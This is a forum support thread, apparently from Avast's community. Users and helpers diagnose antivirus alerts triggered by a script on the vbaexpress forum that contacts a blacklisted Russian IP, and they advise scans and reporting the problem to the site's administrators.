In the last week, a forum I subscribe to www.vbaexpress.com does not allow me to login as Avast pops up the error message below/attached. It is particular to that website, I have no other problems, my browser works normally and a ran a boot-scan - nothing - and it doesn’t appear in any log. The admin of the forum posted that no one else seemed to have that problem (but then they use Norton). Their IP is 72… not 78… so I am really confused over this.
Stan
Network Shield is blocking that particular address. Something seems cheesy in that page, maybe the site was hacked.
Strange I have just visited that link and no alert by the network shield.
However, it isn’t the vbaexpress that the network shield is blocking, but something on your system trying to access the IP address 78.110.175.21 there is a topic on this one. See http://forum.avast.com/index.php?topic=41423.0 and this particular post, see quote below.
See if this file is in the systen32 folder, and add it to the User Files section of the avast Chest and send a sample to avast (see below). Important don’t do anything with the file in the c:\windows\system32\drivers folder
Add the file to the User Files (File, Add) section of the avast chest (if it isn’t already there) where it can do no harm and send it from there. A copy of the file/s will remain in the original location, so you will need to take further action and can remove/rename that.
Send it from the User Files section of the chest (select the file, right click, email to Alwil Software). It will be uploaded (not actually emailed) to avast when the next avast auto (or manual) update is done.
It could be an ad on the site I know that my avast found an AD on gamespy that have a virus
It isn’t an ad on the site (or I too would have got the alert when I checked it), that IP address is associated with a known malware source. avast isn’t alerting on a specific file but something trying to gain access to that IP.
The IP also has history in the forums, which is why I sent stanl to the other topic.
I tried the wdmaud.sys suggestion. The file was located only in …\drivers folder, and erasing it didn’t eliminate the netshield pop-up, and the sys file returned. However, I copied wdmaud.sys from c:\windows\servicepackfiles\i386 and overwrote the one in …\drivers and although identical in byte count and date, the pop-up didn’t appear when I navigated to the vbaexpress forum… Hopefully it stays that way, although I still don’t understand. Stan
I said not to touch that I even put it in Red as it isn’t that one at all ???
As I said it had nothing to do with the vbaexpress site that just happened to be the site you were viewing when avast alerted to the attempt from your system to connect to that IP number (Russian domain)
There may still be that file in the system32 folder make sure it isn’t hidden or not showing the file type, etc, see below.
Sorry, but no that file is not in system32, and yes, the netshield pop-up came back. This is happening at home, where there is my laptop, my wife’s and to old desktops (compaq and dell) on Time Warner broadband. After the pop-up came back, I went downstairs and fired up my old dell, navigated to vbaexpress and the netshield pop-up appeared again. I haven’t even powered the dell on in a month, so I was wondering if somehow the pop-up is connected to our router address [NOTE: the dell and compaq are in a workgroup to share printers, but the laptops are independent of the desktops and connect wifi].
And, why it picks that particular url is beyond me, there are other forums and blogs I frequent several times a day, while vbaexpress is a once a week thing. Stan
I thought that the pop-ups would come back as they weren’t related to that file in the drivers folder.
Well your Dell would probably have an old version of the program and I don’t know what VPS version it might have, as this doesn’t alarm on my system. You say it alarmed again on vbaexpress, but was it the same IP alert as opposed to a specific alert to the vbaexpress site ?
My concern is the IP address as this has been associated with google searches, etc. and this would be totally unrelated to vbaexpress as I and others would be getting alerts on the site when we visited it.
Networks can get cross infected so checking for that file in the system32 folder on that system is a thing you should do.
Try running this tool first on the original system with the old system disconnected from the network, and then on the old Dell whilst it is still off the network.
DrWeb CureIt! ftp://ftp.drweb.com/pub/drweb/cureit/cureit.exe (Free) Fairly effective against file infectors, Virut, more so when used in safe mode.
Thanks again… will do.
What is even stranger about this (at least to me) is I have two favorites, 1 goes to the main vbaexpress url, the second goes directly to the forum, which is a button on the main url. I have removed the forum link, removed all cookies, passwords, autocompletes, ran ad-aware, spybot and malwarebytes, deleted restore points, ran avast boot scan. I can click on the link to go to the vbaexpress main site and tell windows not to persist my password. Everything is fine. But, when I click on the button to go to the forum, the netshield message pops up. My lmhosts file is clear. I have thought about asking the vbaexpress admin to remove my user name and let me sign back up again under a different pw just to see if that makes a difference as I have had at least one user mention that it is not out of the question that a php forum could get infected.
Stan
Adware, perhaps. Is this a Free Site? Many forums are founded on Freeware Hosting sites which inject Adware into their scripts.
I don’t know where this button to go to the forums is that you mention (from the link you first provided), but I clocked a forum link http://vbaexpress.com/forum/ and avast didn’t alert on that page.
So I really don’t know what the problem is, you will either have to be more specific about the link/URL as I can’t find it. However, I’m not logging in as I’m not registered.
I’m using firefox with NoScript (but allowed wbaexpress), but I do notice that there are a lot of off-site scripts and worse still they only show an IP address rather than the domain. To me when I see this I ask what are they trying to hide. One of the IPs is Russian so I would winder what is at that end:
inetnum: 78.110.175.0 - 78.110.175.255 netname: LIMIT-SUREHOST-IP-1 descr: LIMIT SUREHOST IP RANGE 1 country: RU
I appreciate your patience:
I naviagte to http://www.vbaexpress.com/kb/login.php - no problem
I enter my user/pw - no problem - then I get the attached screen [I don’t allow windows to save my password]
I click the button for Forum - the malicious error message pops-up
[previously, after I logged in, I just created a favorites link to the forum url url so I could go directly to the forum].
I have ran/re-ran multiple anti-virus, adaware,spybot,cureit,avast boot scans on my laptop and Dell - and am beginning to agree with another poster on this thread that my login has been signalled for adaware and Avast is blocking it. If I can conclude this with some certainty I would like to bring it up with the admins of vbaexpress. Stan
So does this happen if you just go to the forums before you logon as obviously I can’t do that to test what is happening to you. By the same account nor could any of the Alwil team who would try and investigate if you have reported this as a possible FP on vbaexpress but as I said earlier is isn’t alerting on that site but there must be some link to the malicious site.
Having gone over the topic again and look at the IP address in your first image and you will see that it is the same as the highlighted IP in my last image. So even on that home page there is a script tag with a link to that malicious site alert. So in theory I should have had an alert, but because I use firefox with NoScript, the script associated with that IP would be blocked, so no attempt to connect and no avast alert. If I try to connect directly to this IP avast does alert.
So yes you should report this to the site admins/webmaster wants to check for suspect tags on their site it could have been hacked as personally I can’t see any reason for a link to a Russian site and not one that is masked by using just its IP not domain name.
So does this happen if you just go to the forums before you logon
Yes, but that was when I had windows save my password. Here again [attached] I log into the main url, and actually pull up a kb article, but as soon as I click on forum the pop-up surfaces. Stan
I’m not surprised as there is a script on the forums home page that accesses the suspect site, my image Reply #11 (also image2 this post) and your first image both have the IP address that avast is alerting on.
So it doesn’t seem to matter if you log on or just visit the forums home page those scripts would be loaded, with firefox and NoScript this doesn’t happen as all scripts are blocked unless you specifically allow them.
If I visit the forums home page vbaexpress.com/forum/, without allowing scripts there is only one script blocked that of vbaexpress see image1, if I temporarily allow vbaexpress then there are two further scripts that want to run, see image2 and it is one of those that is for the blocked site.
So in short there really isn’t anything else I can say this really is now down to the Admins/webmaster to investigate why this happens and do something about it.
I cannot thank you enough. I had already forwarded your information via printscreen to the forum. I am assuming Awil already had that site pegged as ‘malicious’… if this works out in the long run we all benefit.
Stan 
You’re welcome.
Well the IP address causing the issues is in a list of blacklisted addresses in the Network Shield to stop people reaching known malware sites, your first image shows it is the Network Shield alerting. That site IP has cropped up in the avast forums (a search will find it) and if I remember rightly it is a particularly nasty infection.
On my images you will see a Red IP address at the bottom, that is the vbaexpress site, so it helps by confirming I was at the vbaexpress site (and not some phishing site).
Also on the forums home page (I didn’t mention it) there there is a <Script tag that has a huge chunk of obfuscated javascript, I honestly can’t see a legitimate purpose for this, javascript is a plain language and when I see that I wonder what is it that they are trying to hide. Now that according to the script title is some Yahoo counter which I find hard to believe, so it could be that that script is the source of the problem, I don’t have enough experience to say.
just an FYI: another user just posted that a malicious redirect might be responsible for the slowdown he and other users have experienced in the past week. Stan
Not unusual as if the redirect is successful you could be infected and what ever is going on as a result of that could well slow the system.